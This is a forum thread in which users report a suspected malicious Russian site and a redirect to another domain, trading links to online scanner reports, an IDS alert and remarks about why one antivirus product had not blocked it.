Suspicious javascript detected?

See: https://www.virustotal.com/nl/url/03bd9f606fc4354b8e14a71cc6b79d0d9fbb446b633f0a502fe04af4562cf0cd/analysis/1395591870/
Flagged here: http://quttera.com/detailed_report/nitkiozz.hotbox.ru
Detected potentially suspicious initialization of function pointer to JavaScript method document.write __tmpvar140497762 = document.write;
http://fetch.scritch.org/%2Bfetch/?url=http%3A%2F%2Fnitkiozz.hotbox.ru&useragent=Fetch+useragent&accept_encoding=
See: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fnitkiozz.hotbox.ru blacklisted for insecure downloads.
See: https://www.mywot.com/en/scorecard/nitkiozz.hotbox.ru
100/100% malicious →
http://zulu.zscaler.com/submission/show/287628eb5eda163ab29bae51867fd431-1395594124

pol

VirusTotal
https://www.virustotal.com/en/file/e6e61b39f979299b9bb62886080c6875dcb3f7e636abd53597ceabe3d830d75f/analysis/1395594568/

Not blocked by Avast.

Im getting redirected to this site: hxxp://mybogner.ru/i/

http://www.siteadvisor.com/sites/mybogner.ru
http://safeweb.norton.com/report/show?url=mybogner.ru
https://www.mywot.com/en/scorecard/mybogner.ru
https://www.virustotal.com/en/url/ed3b916bd8171f9d7bc3d1d9fddf2223e55fbf2b877140928136fb7c255806e5/analysis/1395594730/

Hi Steven Winderlich,

Better not venture out there: https://www.mywot.com/en/scorecard/mybogner.ru?utm_source=addon&utm_content=popup-donuts
I get an IDS alert there for “ET POLICY Maxmind geoip check to /app/geoip.js” → http://urlquery.net/report.php?id=1395595008541
That means there is infection traffic spotted there, that is being used by a trojan.

pol

No big Deal inside a virtual machine.

But i wonder why its not blocked by Avast?

Website is reported to Avast via Mail. :slight_smile:

Hi Steven Winderlich,

Because the main domain is online, but not that particular sub-domain: nitkiozz dot hotbox dot ru.htm
It’s not just you! htxp://nitkiozz.hotbox.ru.htm looks down from here.
So if that is the situation, no longer online, how would avast! add detection then.
They were simply too late, the other 10 were in time to add protection.

polonus

I also send them the other website where i got redirected to. :slight_smile: